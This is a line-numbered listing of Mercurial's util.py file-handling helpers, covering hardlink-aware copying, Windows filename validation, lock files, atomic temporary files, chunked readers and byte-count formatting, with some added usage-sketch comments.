1928 1931 fstype = getfstype(os.path.dirname(dest))
1929 1932 except OSError:
1930 1933 fstype = None
1931 1934 if fstype not in _hardlinkfswhitelist:
1932 1935 hardlink = False
1933 1936 if hardlink:
1934 1937 try:
1935 1938 oslink(src, dest)
1936 1939 return
1937 1940 except (IOError, OSError):
1938 1941 pass # fall back to normal copy
1939 1942 if os.path.islink(src):
1940 1943 os.symlink(os.readlink(src), dest)
1941 1944 # copytime is ignored for symlinks, but in general copytime isn't needed
1942 1945 # for them anyway
1943 1946 else:
1944 1947 try:
1945 1948 shutil.copyfile(src, dest)
1946 1949 if copystat:
1947 1950 # copystat also copies mode
1948 1951 shutil.copystat(src, dest)
1949 1952 else:
1950 1953 shutil.copymode(src, dest)
1951 1954 if oldstat and oldstat.stat:
1952 1955 newstat = filestat.frompath(dest)
1953 1956 if newstat.isambig(oldstat):
1954 1957 # stat of copied file is ambiguous to original one
1955 1958 advanced = (
1956 1959 oldstat.stat[stat.ST_MTIME] + 1
1957 1960 ) & 0x7FFFFFFF
1958 1961 os.utime(dest, (advanced, advanced))
1959 1962 except shutil.Error as inst:
1960 1963 raise error.Abort(stringutil.forcebytestr(inst))
1961 1964
1962 1965
1963 1966 def copyfiles(src, dst, hardlink=None, progress=None):
1964 1967 """Copy a directory tree using hardlinks if possible."""
1965 1968 num = 0
1966 1969
1967 1970 def settopic():
1968 1971 if progress:
1969 1972 progress.topic = _(b'linking') if hardlink else _(b'copying')
1970 1973
1971 1974 if os.path.isdir(src):
1972 1975 if hardlink is None:
1973 1976 hardlink = (
1974 1977 os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
1975 1978 )
1976 1979 settopic()
1977 1980 os.mkdir(dst)
1978 1981 for name, kind in listdir(src):
1979 1982 srcname = os.path.join(src, name)
1980 1983 dstname = os.path.join(dst, name)
1981 1984 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1982 1985 num += n
1983 1986 else:
1984 1987 if hardlink is None:
1985 1988 hardlink = (
1986 1989 os.stat(os.path.dirname(src)).st_dev
1987 1990 == os.stat(os.path.dirname(dst)).st_dev
1988 1991 )
1989 1992 settopic()
1990 1993
1991 1994 if hardlink:
1992 1995 try:
1993 1996 oslink(src, dst)
1994 1997 except (IOError, OSError):
1995 1998 hardlink = False
1996 1999 shutil.copy(src, dst)
1997 2000 else:
1998 2001 shutil.copy(src, dst)
1999 2002 num += 1
2000 2003 if progress:
2001 2004 progress.increment()
2002 2005
2003 2006 return hardlink, num
2004 2007
2005 2008
2006 2009 _winreservednames = {
2007 2010 b'con',
2008 2011 b'prn',
2009 2012 b'aux',
2010 2013 b'nul',
2011 2014 b'com1',
2012 2015 b'com2',
2013 2016 b'com3',
2014 2017 b'com4',
2015 2018 b'com5',
2016 2019 b'com6',
2017 2020 b'com7',
2018 2021 b'com8',
2019 2022 b'com9',
2020 2023 b'lpt1',
2021 2024 b'lpt2',
2022 2025 b'lpt3',
2023 2026 b'lpt4',
2024 2027 b'lpt5',
2025 2028 b'lpt6',
2026 2029 b'lpt7',
2027 2030 b'lpt8',
2028 2031 b'lpt9',
2029 2032 }
2030 2033 _winreservedchars = b':*?"<>|'
2031 2034
2032 2035
2033 2036 def checkwinfilename(path):
2034 2037 # type: (bytes) -> Optional[bytes]
2035 2038 r"""Check that the base-relative path is a valid filename on Windows.
2036 2039 Returns None if the path is ok, or a UI string describing the problem.
2037 2040
2038 2041 >>> checkwinfilename(b"just/a/normal/path")
2039 2042 >>> checkwinfilename(b"foo/bar/con.xml")
2040 2043 "filename contains 'con', which is reserved on Windows"
2041 2044 >>> checkwinfilename(b"foo/con.xml/bar")
2042 2045 "filename contains 'con', which is reserved on Windows"
2043 2046 >>> checkwinfilename(b"foo/bar/xml.con")
2044 2047 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
2045 2048 "filename contains 'AUX', which is reserved on Windows"
2046 2049 >>> checkwinfilename(b"foo/bar/bla:.txt")
2047 2050 "filename contains ':', which is reserved on Windows"
2048 2051 >>> checkwinfilename(b"foo/bar/b\07la.txt")
2049 2052 "filename contains '\\x07', which is invalid on Windows"
2050 2053 >>> checkwinfilename(b"foo/bar/bla ")
2051 2054 "filename ends with ' ', which is not allowed on Windows"
2052 2055 >>> checkwinfilename(b"../bar")
2053 2056 >>> checkwinfilename(b"foo\\")
2054 2057 "filename ends with '\\', which is invalid on Windows"
2055 2058 >>> checkwinfilename(b"foo\\/bar")
2056 2059 "directory name ends with '\\', which is invalid on Windows"
2057 2060 """
2058 2061 if path.endswith(b'\\'):
2059 2062 return _(b"filename ends with '\\', which is invalid on Windows")
2060 2063 if b'\\/' in path:
2061 2064 return _(b"directory name ends with '\\', which is invalid on Windows")
2062 2065 for n in path.replace(b'\\', b'/').split(b'/'):
2063 2066 if not n:
2064 2067 continue
2065 2068 for c in _filenamebytestr(n):
2066 2069 if c in _winreservedchars:
2067 2070 return (
2068 2071 _(
2069 2072 b"filename contains '%s', which is reserved "
2070 2073 b"on Windows"
2071 2074 )
2072 2075 % c
2073 2076 )
2074 2077 if ord(c) <= 31:
2075 2078 return _(
2076 2079 b"filename contains '%s', which is invalid on Windows"
2077 2080 ) % stringutil.escapestr(c)
2078 2081 base = n.split(b'.')[0]
2079 2082 if base and base.lower() in _winreservednames:
2080 2083 return (
2081 2084 _(b"filename contains '%s', which is reserved on Windows")
2082 2085 % base
2083 2086 )
2084 2087 t = n[-1:]
2085 2088 if t in b'. ' and n not in b'..':
2086 2089 return (
2087 2090 _(
2088 2091 b"filename ends with '%s', which is not allowed "
2089 2092 b"on Windows"
2090 2093 )
2091 2094 % t
2092 2095 )
2093 2096
2094 2097
2095 2098 timer = getattr(time, "perf_counter", None)
2096 2099
2097 2100 if pycompat.iswindows:
2098 2101 checkosfilename = checkwinfilename
2099 2102 if not timer:
2100 2103 timer = time.clock
2101 2104 else:
2102 2105 # mercurial.windows doesn't have platform.checkosfilename
2103 2106 checkosfilename = platform.checkosfilename # pytype: disable=module-attr
2104 2107 if not timer:
2105 2108 timer = time.time
2106 2109
2107 2110
2108 2111 def makelock(info, pathname):
2109 2112 """Create a lock file atomically if possible
2110 2113
2111 2114 This may leave a stale lock file if symlink isn't supported and signal
2112 2115 interrupt is enabled.
2113 2116 """
2114 2117 try:
2115 2118 return os.symlink(info, pathname)
2116 2119 except OSError as why:
2117 2120 if why.errno == errno.EEXIST:
2118 2121 raise
2119 2122 except AttributeError: # no symlink in os
2120 2123 pass
2121 2124
2122 2125 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
2123 2126 ld = os.open(pathname, flags)
2124 2127 os.write(ld, info)
2125 2128 os.close(ld)
2126 2129
2127 2130
2128 2131 def readlock(pathname):
2129 2132 # type: (bytes) -> bytes
2130 2133 try:
2131 2134 return readlink(pathname)
2132 2135 except OSError as why:
2133 2136 if why.errno not in (errno.EINVAL, errno.ENOSYS):
2134 2137 raise
2135 2138 except AttributeError: # no symlink in os
2136 2139 pass
2137 2140 with posixfile(pathname, b'rb') as fp:
2138 2141 return fp.read()
2139 2142
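# Sketch of the lock round-trip (path and contents are illustrative;
# the real callers store host/pid information):
#
#   makelock(b'host:1234', b'.hg/wlock')  # symlink, or O_EXCL file
#   readlock(b'.hg/wlock')  ->  b'host:1234'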
2140 2143
2141 2144 def fstat(fp):
2142 2145 '''stat file object that may not have fileno method.'''
2143 2146 try:
2144 2147 return os.fstat(fp.fileno())
2145 2148 except AttributeError:
2146 2149 return os.stat(fp.name)
2147 2150
2148 2151
2149 2152 # File system features
2150 2153
2151 2154
2152 2155 def fscasesensitive(path):
2153 2156 # type: (bytes) -> bool
2154 2157 """
2155 2158 Return true if the given path is on a case-sensitive filesystem
2156 2159
2157 2160 Requires a path (like /foo/.hg) ending with a foldable final
2158 2161 directory component.
2159 2162 """
2160 2163 s1 = os.lstat(path)
2161 2164 d, b = os.path.split(path)
2162 2165 b2 = b.upper()
2163 2166 if b == b2:
2164 2167 b2 = b.lower()
2165 2168 if b == b2:
2166 2169 return True # no evidence against case sensitivity
2167 2170 p2 = os.path.join(d, b2)
2168 2171 try:
2169 2172 s2 = os.lstat(p2)
2170 2173 if s2 == s1:
2171 2174 return False
2172 2175 return True
2173 2176 except OSError:
2174 2177 return True
2175 2178
2176 2179
2177 2180 try:
2178 2181 import re2 # pytype: disable=import-error
2179 2182
2180 2183 _re2 = None
2181 2184 except ImportError:
2182 2185 _re2 = False
2183 2186
2184 2187
2185 2188 class _re(object):
2186 2189 def _checkre2(self):
2187 2190 global _re2
2188 2191 try:
2189 2192 # check if match works, see issue3964
2190 2193 _re2 = bool(re2.match(br'\[([^\[]+)\]', b'[ui]'))
2191 2194 except ImportError:
2192 2195 _re2 = False
2193 2196
2194 2197 def compile(self, pat, flags=0):
2195 2198 """Compile a regular expression, using re2 if possible
2196 2199
2197 2200 For best performance, use only re2-compatible regexp features. The
2198 2201 only flags from the re module that are re2-compatible are
2199 2202 IGNORECASE and MULTILINE."""
2200 2203 if _re2 is None:
2201 2204 self._checkre2()
2202 2205 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
2203 2206 if flags & remod.IGNORECASE:
2204 2207 pat = b'(?i)' + pat
2205 2208 if flags & remod.MULTILINE:
2206 2209 pat = b'(?m)' + pat
2207 2210 try:
2208 2211 return re2.compile(pat)
2209 2212 except re2.error:
2210 2213 pass
2211 2214 return remod.compile(pat, flags)
2212 2215
2213 2216 @propertycache
2214 2217 def escape(self):
2215 2218 """Return the version of escape corresponding to self.compile.
2216 2219
2217 2220 This is imperfect because whether re2 or re is used for a particular
2218 2221 function depends on the flags, etc, but it's the best we can do.
2219 2222 """
2220 2223 global _re2
2221 2224 if _re2 is None:
2222 2225 self._checkre2()
2223 2226 if _re2:
2224 2227 return re2.escape
2225 2228 else:
2226 2229 return remod.escape
2227 2230
2228 2231
2229 2232 re = _re()
2230 2233
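# Usage sketch: this module-level instance is used like the stdlib
# module, transparently preferring re2 when it is usable:
#
#   pat = re.compile(br'^[a-f0-9]+$', remod.IGNORECASE)
#   pat.match(b'deadbeef')
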
2231 2234 _fspathcache = {}
2232 2235
2233 2236
2234 2237 def fspath(name, root):
2235 2238 # type: (bytes, bytes) -> bytes
2236 2239 """Get name in the case stored in the filesystem
2237 2240
2238 2241 The name should be relative to root, and be normcase-ed for efficiency.
2239 2242
2240 2243 Note that this function is unnecessary, and should not be
2241 2244 called, for case-sensitive filesystems (simply because it's expensive).
2242 2245
2243 2246 The root should be normcase-ed, too.
2244 2247 """
2245 2248
2246 2249 def _makefspathcacheentry(dir):
2247 2250 return {normcase(n): n for n in os.listdir(dir)}
2248 2251
2249 2252 seps = pycompat.ossep
2250 2253 if pycompat.osaltsep:
2251 2254 seps = seps + pycompat.osaltsep
2252 2255 # Protect backslashes. This gets silly very quickly.
2253 2256 seps = seps.replace(b'\\', b'\\\\')
2254 2257 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
2255 2258 dir = os.path.normpath(root)
2256 2259 result = []
2257 2260 for part, sep in pattern.findall(name):
2258 2261 if sep:
2259 2262 result.append(sep)
2260 2263 continue
2261 2264
2262 2265 if dir not in _fspathcache:
2263 2266 _fspathcache[dir] = _makefspathcacheentry(dir)
2264 2267 contents = _fspathcache[dir]
2265 2268
2266 2269 found = contents.get(part)
2267 2270 if not found:
2268 2271 # retry "once per directory" per "dirstate.walk" which
2269 2272 # may take place for each patch of "hg qpush", for example
2270 2273 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
2271 2274 found = contents.get(part)
2272 2275
2273 2276 result.append(found or part)
2274 2277 dir = os.path.join(dir, part)
2275 2278
2276 2279 return b''.join(result)
2277 2280
2278 2281
2279 2282 def checknlink(testfile):
2280 2283 # type: (bytes) -> bool
2281 2284 '''check whether hardlink count reporting works properly'''
2282 2285
2283 2286 # testfile may be open, so we need a separate file for checking to
2284 2287 # work around issue2543 (or testfile may get lost on Samba shares)
2285 2288 f1, f2, fp = None, None, None
2286 2289 try:
2287 2290 fd, f1 = pycompat.mkstemp(
2288 2291 prefix=b'.%s-' % os.path.basename(testfile),
2289 2292 suffix=b'1~',
2290 2293 dir=os.path.dirname(testfile),
2291 2294 )
2292 2295 os.close(fd)
2293 2296 f2 = b'%s2~' % f1[:-2]
2294 2297
2295 2298 oslink(f1, f2)
2296 2299 # nlinks() may behave differently for files on Windows shares if
2297 2300 # the file is open.
2298 2301 fp = posixfile(f2)
2299 2302 return nlinks(f2) > 1
2300 2303 except OSError:
2301 2304 return False
2302 2305 finally:
2303 2306 if fp is not None:
2304 2307 fp.close()
2305 2308 for f in (f1, f2):
2306 2309 try:
2307 2310 if f is not None:
2308 2311 os.unlink(f)
2309 2312 except OSError:
2310 2313 pass
2311 2314
2312 2315
2313 2316 def endswithsep(path):
2314 2317 # type: (bytes) -> bool
2315 2318 '''Check path ends with os.sep or os.altsep.'''
2316 2319 return bool( # help pytype
2317 2320 path.endswith(pycompat.ossep)
2318 2321 or pycompat.osaltsep
2319 2322 and path.endswith(pycompat.osaltsep)
2320 2323 )
2321 2324
2322 2325
2323 2326 def splitpath(path):
2324 2327 # type: (bytes) -> List[bytes]
2325 2328 """Split path by os.sep.
2326 2329 Note that this function does not use os.altsep because it is
2327 2330 an alternative to the simple "xxx.split(os.sep)".
2328 2331 It is recommended to use os.path.normpath() before using this
2329 2332 function if needed."""
2330 2333 return path.split(pycompat.ossep)
2331 2334
2332 2335
2333 2336 def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
2334 2337 """Create a temporary file with the same contents from name
2335 2338
2336 2339 The permission bits are copied from the original file.
2337 2340
2338 2341 If the temporary file is going to be truncated immediately, you
2339 2342 can use emptyok=True as an optimization.
2340 2343
2341 2344 Returns the name of the temporary file.
2342 2345 """
2343 2346 d, fn = os.path.split(name)
2344 2347 fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
2345 2348 os.close(fd)
2346 2349 # Temporary files are created with mode 0600, which is usually not
2347 2350 # what we want. If the original file already exists, just copy
2348 2351 # its mode. Otherwise, manually obey umask.
2349 2352 copymode(name, temp, createmode, enforcewritable)
2350 2353
2351 2354 if emptyok:
2352 2355 return temp
2353 2356 try:
2354 2357 try:
2355 2358 ifp = posixfile(name, b"rb")
2356 2359 except IOError as inst:
2357 2360 if inst.errno == errno.ENOENT:
2358 2361 return temp
2359 2362 if not getattr(inst, 'filename', None):
2360 2363 inst.filename = name
2361 2364 raise
2362 2365 ofp = posixfile(temp, b"wb")
2363 2366 for chunk in filechunkiter(ifp):
2364 2367 ofp.write(chunk)
2365 2368 ifp.close()
2366 2369 ofp.close()
2367 2370 except: # re-raises
2368 2371 try:
2369 2372 os.unlink(temp)
2370 2373 except OSError:
2371 2374 pass
2372 2375 raise
2373 2376 return temp
2374 2377
2375 2378
2376 2379 class filestat(object):
2377 2380 """help to exactly detect change of a file
2378 2381
2379 2382 'stat' attribute is result of 'os.stat()' if specified 'path'
2380 2383 exists. Otherwise, it is None. This can avoid preparative
2381 2384 'exists()' examination on client side of this class.
2382 2385 """
2383 2386
2384 2387 def __init__(self, stat):
2385 2388 self.stat = stat
2386 2389
2387 2390 @classmethod
2388 2391 def frompath(cls, path):
2389 2392 try:
2390 2393 stat = os.stat(path)
2391 2394 except OSError as err:
2392 2395 if err.errno != errno.ENOENT:
2393 2396 raise
2394 2397 stat = None
2395 2398 return cls(stat)
2396 2399
2397 2400 @classmethod
2398 2401 def fromfp(cls, fp):
2399 2402 stat = os.fstat(fp.fileno())
2400 2403 return cls(stat)
2401 2404
2402 2405 __hash__ = object.__hash__
2403 2406
2404 2407 def __eq__(self, old):
2405 2408 try:
2406 2409 # if ambiguity between stat of new and old file is
2407 2410 # avoided, comparison of size, ctime and mtime is enough
2408 2411 # to exactly detect change of a file regardless of platform
2409 2412 return (
2410 2413 self.stat.st_size == old.stat.st_size
2411 2414 and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2412 2415 and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
2413 2416 )
2414 2417 except AttributeError:
2415 2418 pass
2416 2419 try:
2417 2420 return self.stat is None and old.stat is None
2418 2421 except AttributeError:
2419 2422 return False
2420 2423
2421 2424 def isambig(self, old):
2422 2425 """Examine whether new (= self) stat is ambiguous against old one
2423 2426
2424 2427 "S[N]" below means stat of a file at N-th change:
2425 2428
2426 2429 - S[n-1].ctime < S[n].ctime: can detect change of a file
2427 2430 - S[n-1].ctime == S[n].ctime
2428 2431 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
2429 2432 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
2430 2433 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
2431 2434 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
2432 2435
2433 2436 Case (*2) above means that a file was changed twice or more at
2434 2437 same time in sec (= S[n-1].ctime), and comparison of timestamp
2435 2438 is ambiguous.
2436 2439
2437 2440 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2438 2441 timestamp is ambiguous".
2439 2442
2440 2443 But advancing mtime only in case (*2) doesn't work as
2441 2444 expected, because naturally advanced S[n].mtime in case (*1)
2442 2445 might be equal to manually advanced S[n-1 or earlier].mtime.
2443 2446
2444 2447 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2445 2448 treated as ambiguous regardless of mtime, to avoid overlooking
2446 2449 changes hidden by collisions between such mtimes.
2447 2450
2448 2451 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2449 2452 S[n].mtime", even if size of a file isn't changed.
2450 2453 """
2451 2454 try:
2452 2455 return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
2453 2456 except AttributeError:
2454 2457 return False
2455 2458
2456 2459 def avoidambig(self, path, old):
2457 2460 """Change file stat of specified path to avoid ambiguity
2458 2461
2459 2462 'old' should be previous filestat of 'path'.
2460 2463
2461 2464 This skips avoiding ambiguity, if a process doesn't have
2462 2465 appropriate privileges for 'path'. This returns False in this
2463 2466 case.
2464 2467
2465 2468 Otherwise, this returns True, as "ambiguity is avoided".
2466 2469 """
2467 2470 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2468 2471 try:
2469 2472 os.utime(path, (advanced, advanced))
2470 2473 except OSError as inst:
2471 2474 if inst.errno == errno.EPERM:
2472 2475 # utime() on the file created by another user causes EPERM,
2473 2476 # if a process doesn't have appropriate privileges
2474 2477 return False
2475 2478 raise
2476 2479 return True
2477 2480
2478 2481 def __ne__(self, other):
2479 2482 return not self == other
2480 2483
2481 2484
2482 2485 class atomictempfile(object):
2483 2486 """writable file object that atomically updates a file
2484 2487
2485 2488 All writes will go to a temporary copy of the original file. Call
2486 2489 close() when you are done writing, and atomictempfile will rename
2487 2490 the temporary copy to the original name, making the changes
2488 2491 visible. If the object is destroyed without being closed, all your
2489 2492 writes are discarded.
2490 2493
2491 2494 checkambig argument of constructor is used with filestat, and is
2492 2495 useful only if target file is guarded by any lock (e.g. repo.lock
2493 2496 or repo.wlock).
2494 2497 """
2495 2498
2496 2499 def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
2497 2500 self.__name = name # permanent name
2498 2501 self._tempname = mktempcopy(
2499 2502 name,
2500 2503 emptyok=(b'w' in mode),
2501 2504 createmode=createmode,
2502 2505 enforcewritable=(b'w' in mode),
2503 2506 )
2504 2507
2505 2508 self._fp = posixfile(self._tempname, mode)
2506 2509 self._checkambig = checkambig
2507 2510
2508 2511 # delegated methods
2509 2512 self.read = self._fp.read
2510 2513 self.write = self._fp.write
2511 2514 self.seek = self._fp.seek
2512 2515 self.tell = self._fp.tell
2513 2516 self.fileno = self._fp.fileno
2514 2517
2515 2518 def close(self):
2516 2519 if not self._fp.closed:
2517 2520 self._fp.close()
2518 2521 filename = localpath(self.__name)
2519 2522 oldstat = self._checkambig and filestat.frompath(filename)
2520 2523 if oldstat and oldstat.stat:
2521 2524 rename(self._tempname, filename)
2522 2525 newstat = filestat.frompath(filename)
2523 2526 if newstat.isambig(oldstat):
2524 2527 # stat of changed file is ambiguous to original one
2525 2528 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
2526 2529 os.utime(filename, (advanced, advanced))
2527 2530 else:
2528 2531 rename(self._tempname, filename)
2529 2532
2530 2533 def discard(self):
2531 2534 if not self._fp.closed:
2532 2535 try:
2533 2536 os.unlink(self._tempname)
2534 2537 except OSError:
2535 2538 pass
2536 2539 self._fp.close()
2537 2540
2538 2541 def __del__(self):
2539 2542 if safehasattr(self, '_fp'): # constructor actually did something
2540 2543 self.discard()
2541 2544
2542 2545 def __enter__(self):
2543 2546 return self
2544 2547
2545 2548 def __exit__(self, exctype, excvalue, traceback):
2546 2549 if exctype is not None:
2547 2550 self.discard()
2548 2551 else:
2549 2552 self.close()
2550 2553
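# Usage sketch (the filename is illustrative): writes land in a
# temporary copy that is renamed over the target only on a clean close:
#
#   with atomictempfile(b'requires', b'wb', checkambig=True) as fp:
#       fp.write(b'data\n')
#
# If an exception escapes the block, the temporary file is discarded
# and the target is left untouched.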
2551 2554
2552 2555 def unlinkpath(f, ignoremissing=False, rmdir=True):
2553 2556 # type: (bytes, bool, bool) -> None
2554 2557 """unlink and remove the directory if it is empty"""
2555 2558 if ignoremissing:
2556 2559 tryunlink(f)
2557 2560 else:
2558 2561 unlink(f)
2559 2562 if rmdir:
2560 2563 # try removing directories that might now be empty
2561 2564 try:
2562 2565 removedirs(os.path.dirname(f))
2563 2566 except OSError:
2564 2567 pass
2565 2568
2566 2569
2567 2570 def tryunlink(f):
2568 2571 # type: (bytes) -> None
2569 2572 """Attempt to remove a file, ignoring ENOENT errors."""
2570 2573 try:
2571 2574 unlink(f)
2572 2575 except OSError as e:
2573 2576 if e.errno != errno.ENOENT:
2574 2577 raise
2575 2578
2576 2579
2577 2580 def makedirs(name, mode=None, notindexed=False):
2578 2581 # type: (bytes, Optional[int], bool) -> None
2579 2582 """recursive directory creation with parent mode inheritance
2580 2583
2581 2584 Newly created directories are marked as "not to be indexed by
2582 2585 the content indexing service", if ``notindexed`` is specified
2583 2586 for "write" mode access.
2584 2587 """
2585 2588 try:
2586 2589 makedir(name, notindexed)
2587 2590 except OSError as err:
2588 2591 if err.errno == errno.EEXIST:
2589 2592 return
2590 2593 if err.errno != errno.ENOENT or not name:
2591 2594 raise
2592 2595 parent = os.path.dirname(os.path.abspath(name))
2593 2596 if parent == name:
2594 2597 raise
2595 2598 makedirs(parent, mode, notindexed)
2596 2599 try:
2597 2600 makedir(name, notindexed)
2598 2601 except OSError as err:
2599 2602 # Catch EEXIST to handle races
2600 2603 if err.errno == errno.EEXIST:
2601 2604 return
2602 2605 raise
2603 2606 if mode is not None:
2604 2607 os.chmod(name, mode)
2605 2608
2606 2609
2607 2610 def readfile(path):
2608 2611 # type: (bytes) -> bytes
2609 2612 with open(path, b'rb') as fp:
2610 2613 return fp.read()
2611 2614
2612 2615
2613 2616 def writefile(path, text):
2614 2617 # type: (bytes, bytes) -> None
2615 2618 with open(path, b'wb') as fp:
2616 2619 fp.write(text)
2617 2620
2618 2621
2619 2622 def appendfile(path, text):
2620 2623 # type: (bytes, bytes) -> None
2621 2624 with open(path, b'ab') as fp:
2622 2625 fp.write(text)
2623 2626
2624 2627
2625 2628 class chunkbuffer(object):
2626 2629 """Allow arbitrary sized chunks of data to be efficiently read from an
2627 2630 iterator over chunks of arbitrary size."""
2628 2631
2629 2632 def __init__(self, in_iter):
2630 2633 """in_iter is the iterator that's iterating over the input chunks."""
2631 2634
2632 2635 def splitbig(chunks):
2633 2636 for chunk in chunks:
2634 2637 if len(chunk) > 2 ** 20:
2635 2638 pos = 0
2636 2639 while pos < len(chunk):
2637 2640 end = pos + 2 ** 18
2638 2641 yield chunk[pos:end]
2639 2642 pos = end
2640 2643 else:
2641 2644 yield chunk
2642 2645
2643 2646 self.iter = splitbig(in_iter)
2644 2647 self._queue = collections.deque()
2645 2648 self._chunkoffset = 0
2646 2649
2647 2650 def read(self, l=None):
2648 2651 """Read L bytes of data from the iterator of chunks of data.
2649 2652 Returns less than L bytes if the iterator runs dry.
2650 2653
2651 2654 If size parameter is omitted, read everything"""
2652 2655 if l is None:
2653 2656 return b''.join(self.iter)
2654 2657
2655 2658 left = l
2656 2659 buf = []
2657 2660 queue = self._queue
2658 2661 while left > 0:
2659 2662 # refill the queue
2660 2663 if not queue:
2661 2664 target = 2 ** 18
2662 2665 for chunk in self.iter:
2663 2666 queue.append(chunk)
2664 2667 target -= len(chunk)
2665 2668 if target <= 0:
2666 2669 break
2667 2670 if not queue:
2668 2671 break
2669 2672
2670 2673 # The easy way to do this would be to queue.popleft(), modify the
2671 2674 # chunk (if necessary), then queue.appendleft(). However, for cases
2672 2675 # where we read partial chunk content, this incurs 2 dequeue
2673 2676 # mutations and creates a new str for the remaining chunk in the
2674 2677 # queue. Our code below avoids this overhead.
2675 2678
2676 2679 chunk = queue[0]
2677 2680 chunkl = len(chunk)
2678 2681 offset = self._chunkoffset
2679 2682
2680 2683 # Use full chunk.
2681 2684 if offset == 0 and left >= chunkl:
2682 2685 left -= chunkl
2683 2686 queue.popleft()
2684 2687 buf.append(chunk)
2685 2688 # self._chunkoffset remains at 0.
2686 2689 continue
2687 2690
2688 2691 chunkremaining = chunkl - offset
2689 2692
2690 2693 # Use all of unconsumed part of chunk.
2691 2694 if left >= chunkremaining:
2692 2695 left -= chunkremaining
2693 2696 queue.popleft()
2694 2697 # offset == 0 is enabled by block above, so this won't merely
2695 2698 # copy via ``chunk[0:]``.
2696 2699 buf.append(chunk[offset:])
2697 2700 self._chunkoffset = 0
2698 2701
2699 2702 # Partial chunk needed.
2700 2703 else:
2701 2704 buf.append(chunk[offset : offset + left])
2702 2705 self._chunkoffset += left
2703 2706 left -= chunkremaining
2704 2707
2705 2708 return b''.join(buf)
2706 2709
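# Behavior sketch: reads are satisfied across chunk boundaries without
# re-splitting the iterator's chunks:
#
#   cb = chunkbuffer(iter([b'abc', b'defg']))
#   cb.read(4)   ->  b'abcd'
#   cb.read(10)  ->  b'efg'  (iterator ran dry, so the read is short)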
2707 2710
2708 2711 def filechunkiter(f, size=131072, limit=None):
2709 2712 """Create a generator that produces the data in the file size
2710 2713 (default 131072) bytes at a time, up to optional limit (default is
2711 2714 to read all data). Chunks may be less than size bytes if the
2712 2715 chunk is the last chunk in the file, or the file is a socket or
2713 2716 some other type of file that sometimes reads less data than is
2714 2717 requested."""
2715 2718 assert size >= 0
2716 2719 assert limit is None or limit >= 0
2717 2720 while True:
2718 2721 if limit is None:
2719 2722 nbytes = size
2720 2723 else:
2721 2724 nbytes = min(limit, size)
2722 2725 s = nbytes and f.read(nbytes)
2723 2726 if not s:
2724 2727 break
2725 2728 if limit:
2726 2729 limit -= len(s)
2727 2730 yield s
2728 2731
2729 2732
2730 2733 class cappedreader(object):
2731 2734 """A file object proxy that allows reading up to N bytes.
2732 2735
2733 2736 Given a source file object, instances of this type allow reading up to
2734 2737 N bytes from that source file object. Attempts to read past the allowed
2735 2738 limit are treated as EOF.
2736 2739
2737 2740 It is assumed that I/O is not performed on the original file object
2738 2741 in addition to I/O that is performed by this instance. If other I/O
2739 2742 occurs, state tracking will get out of sync and unexpected results will ensue.
2740 2743 """
2741 2744
2742 2745 def __init__(self, fh, limit):
2743 2746 """Allow reading up to <limit> bytes from <fh>."""
2744 2747 self._fh = fh
2745 2748 self._left = limit
2746 2749
2747 2750 def read(self, n=-1):
2748 2751 if not self._left:
2749 2752 return b''
2750 2753
2751 2754 if n < 0:
2752 2755 n = self._left
2753 2756
2754 2757 data = self._fh.read(min(n, self._left))
2755 2758 self._left -= len(data)
2756 2759 assert self._left >= 0
2757 2760
2758 2761 return data
2759 2762
2760 2763 def readinto(self, b):
2761 2764 res = self.read(len(b))
2762 2765 if res is None:
2763 2766 return None
2764 2767
2765 2768 b[0 : len(res)] = res
2766 2769 return len(res)
2767 2770
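# Behavior sketch (assumes an 'import io' for the in-memory file):
#
#   fh = io.BytesIO(b'abcdef')
#   reader = cappedreader(fh, 3)
#   reader.read()   ->  b'abc'
#   reader.read(1)  ->  b''  (limit reached, treated as EOF)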
2768 2771
2769 2772 def unitcountfn(*unittable):
2770 2773 '''return a function that renders a readable count of some quantity'''
2771 2774
2772 2775 def go(count):
2773 2776 for multiplier, divisor, format in unittable:
2774 2777 if abs(count) >= divisor * multiplier:
2775 2778 return format % (count / float(divisor))
2776 2779 return unittable[-1][2] % count
2777 2780
2778 2781 return go
2779 2782
2780 2783
2781 2784 def processlinerange(fromline, toline):
2782 2785 # type: (int, int) -> Tuple[int, int]
2783 2786 """Check that linerange <fromline>:<toline> makes sense and return a
2784 2787 0-based range.
2785 2788
2786 2789 >>> processlinerange(10, 20)
2787 2790 (9, 20)
2788 2791 >>> processlinerange(2, 1)
2789 2792 Traceback (most recent call last):
2790 2793 ...
2791 2794 ParseError: line range must be positive
2792 2795 >>> processlinerange(0, 5)
2793 2796 Traceback (most recent call last):
2794 2797 ...
2795 2798 ParseError: fromline must be strictly positive
2796 2799 """
2797 2800 if toline - fromline < 0:
2798 2801 raise error.ParseError(_(b"line range must be positive"))
2799 2802 if fromline < 1:
2800 2803 raise error.ParseError(_(b"fromline must be strictly positive"))
2801 2804 return fromline - 1, toline
2802 2805
2803 2806
2804 2807 bytecount = unitcountfn(
2805 2808 (100, 1 << 30, _(b'%.0f GB')),
2806 2809 (10, 1 << 30, _(b'%.1f GB')),
2807 2810 (1, 1 << 30, _(b'%.2f GB')),
2808 2811 (100, 1 << 20, _(b'%.0f MB')),
2809 2812 (10, 1 << 20, _(b'%.1f MB')),
